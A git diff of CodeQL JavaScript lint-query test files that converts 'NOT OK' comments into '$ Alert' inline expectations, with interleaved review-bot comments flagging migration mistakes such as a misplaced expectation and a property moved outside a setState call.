@@ -53,7 +48,7 @@ function same(a, b) { return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js 
@@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..b440cc2dd5ed 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js 
@@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { // $ Alert 'i': 1, 'j': 2 } - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..19b6a3824805 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,7 +5,7 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, @@ -13,19 +13,18 @@ function A() { return _x; }, set x(v) { - // NOT OK - }, + }, // $ Alert get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; @@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} 
@@ -12,6 +12,6 @@ var o = { otherglobal: function (x) {return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..046ca3aec677 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,28 +16,26 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); 
@@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { @@ -111,14 +108,14 @@ parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // OK - but still flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js 
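Review bot: `throwerIndirect(42); // OK - but still flagged due to complexity` in the `@@ -111,14 +108,14 @@` hunk describes a result the query still reports but carries no expectation, so under the inline-expectations framework that result will surface as an unexpected alert. If it is still reported, mark it as a known false positive the way `new c.m(); // $ MISSED: Alert` marks false negatives elsewhere in this patch: `throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity`. If the query no longer flags it, the trailing explanation is stale and should be dropped instead.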
@@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..6ea353f77b5e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js index a68f3ad35f9b..7a61221e8a90 100644 
--- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js @@ -1,6 +1,5 @@ function idMaker(){ var index = 0; while(true) - // NOT OK - yield index++; + yield index++; // $ Alert } diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..d7799470bc2f 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert 
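Review bot: The explanation on `mod2.bar; // $ Alert - \`mod2\` is \`./b\`, which does not export \`call\`` in the multi_import.js hunk names the wrong property: the access is `.bar`, and the line above already states that `./b` is the module that exports `call`, so the reason this read is dubious is that `./b` does not export `bar`. Since the commit is rewriting this comment anyway, it should read `mod2.bar; // $ Alert - \`mod2\` is \`./b\`, which does not export \`bar\``.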
diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; 
diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js @@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js index 9a561d4a340d..8023c7511b64 100644 
--- a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js @@ -4,19 +4,19 @@ exports.baz = 56; exports.alert = 72; /*global bar*/ -bar(); // OK +bar(); baz = function() {}; -baz(); // OK +baz(); -alert(); // OK +alert(); -exports.isNaN = isNaN // OK +exports.isNaN = isNaN || function(x) { return x !== x; }; exports.someGlobal = 100; -someGlobal(); // OK +someGlobal(); window.otherGlobal = function() {}; exports.otherGlobal = otherGlobal; -otherGlobal(); // OK +otherGlobal(); diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js index 750fbe53712d..9e6301b5bb38 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../../package.json (though not in ./package.json) -require('mod'); // OK: found in ../node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../../package.json (though not in ./package.json) +require('mod'); // OK - found in ../node_modules/mod \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js index ba7d097a552e..abc92ca81047 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../package.json -require('mod'); // OK: found in ./node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../package.json +require('mod'); // OK - found in ./node_modules/mod \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js index 878d59a100d4..b5d9982bd4e0 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js @@ -1,11 +1,11 @@ -require('fs'); // OK: there is an externs file for it -require('other'); // NOT OK: there is an externs file, but it is not a Node.js module -require('foo'); // OK: declared as a dependency -require('bar/sub'); // OK: 'bar' declared as a dependency -require('./local'); // OK: local import -require('/global'); // OK: global import -require('mod'); // NOT OK -require('undeclared'); // NOT OK -require('jade!./template.jade'); // OK: WebPack loader -require('imports?$=jquery!./m.js'); // OK: WebPack shim -require('react'); // OK: peer dependency \ No newline at end of file +require('fs'); // OK - there is an externs file for it +require('other'); // $ Alert - there is an externs file, but it is not a Node.js module +require('foo'); // OK - declared as a dependency +require('bar/sub'); // OK - 'bar' declared as a dependency +require('./local'); // OK - local import +require('/global'); // OK - global import +require('mod'); // $ Alert +require('undeclared'); // $ Alert +require('jade!./template.jade'); // OK - WebPack loader +require('imports?$=jquery!./m.js'); // OK - WebPack shim +require('react'); // OK - peer dependency \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js index ae78d6699400..b11ad45452ef 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js 
@@ -1 +1 @@ -require('m'); // OK: no package.json, so assume incomplete code and don't flag \ No newline at end of file +require('m'); // OK - no package.json, so assume incomplete code and don't flag \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js index c379b0ba530e..4ab65194e8df 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js @@ -1,27 +1,24 @@ var o = { x: 1, y: 2, z: 3 }; -// OK: toplevel for-in +// OK - toplevel for-in for (var p in o); function f() { - // OK: local variable + // OK - local variable for (var p in o); } function g() { - // NOT OK: property - var q = [], i = 0; + var q = [], i = 0; // $ Alert - property for (q[i++] in o); } function h() { - // NOT OK: global - for (p in o); + for (p in o); // $ Alert - global } function k() { - // NOT OK: captured - for (var p in o); + for (var p in o); // $ Alert - captured return function() { return p; }; @@ -30,15 +27,13 @@ function k() { function l() { var p; function m() { - // NOT OK: captured - for (p in o); + for (p in o); // $ Alert - captured } } function m() { - // NOT OK: global - for (p of o); + for (p of o); // $ Alert - global } -// OK: toplevel +// OK - toplevel for (p of o); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js index 577fc79d5879..efe3e1cd14b0 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js @@ -1,5 +1,4 @@ -// NOT OK -function sum(xs, start) { +function sum(xs, start) { // $ Alert if (arguments.length < 2) start = 0; 
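Review bot: In `g()` of the NonLocalForIn test the `$ Alert - property` expectation is attached to `var q = [], i = 0;` rather than to the `for (q[i++] in o);` statement two lines below, whereas `h()` and `k()` in the same hunk put the expectation on the for-in line itself. The old `// NOT OK: property` comment sat above the declaration, so a line-by-line migration naturally lands there, but the query's result is presumably reported on the loop; if so this expectation registers on the wrong line. Moving the marker, `for (q[i++] in o); // $ Alert - property`, keeps the three cases consistent.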
@@ -10,7 +9,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, start) { if (typeof start === 'undefined') start = 0; @@ -22,7 +21,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, _start) { var start = arguments.length < 2 ? _start : 0; diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..9e87ae3819bc 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -26,7 +26,7 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK + counter: this.state.foo // $ Alert }); } } @@ -34,7 +34,7 @@ class C4 extends React.Component { class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } 
@@ -42,13 +42,13 @@ class C5 extends React.Component { class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -56,13 +56,13 @@ class C7 extends React.Component { class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } } @@ -70,13 +70,13 @@ class C8 extends React.Component { class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } @@ -84,14 +84,14 @@ class C9 extends React.Component { class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // NOT OK, but ignored because it is safe in practice + foo: this.state.foo, // $ Alert }); + bar: this.state.bar // OK - ignored because it is safe in practice } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK + foo: self.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..28cd077964f6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js 
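Review bot: In `C10.upd8a` the migrated `bar` property ends up outside the `setState` argument: the new side reads `foo: this.state.foo, // $ Alert`, then the context line `});`, then `bar: this.state.bar // OK - ignored because it is safe in practice`, which is now a labeled expression statement in the method body, so the case the old `bar` line tested no longer reaches `setState`. Put the property back inside the object literal, directly after the `foo` line and before `});`: `bar: this.state.bar // OK - ignored because it is safe in practice`. The trailing comma on the `foo` line then also stops looking stray.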
+++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
} }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
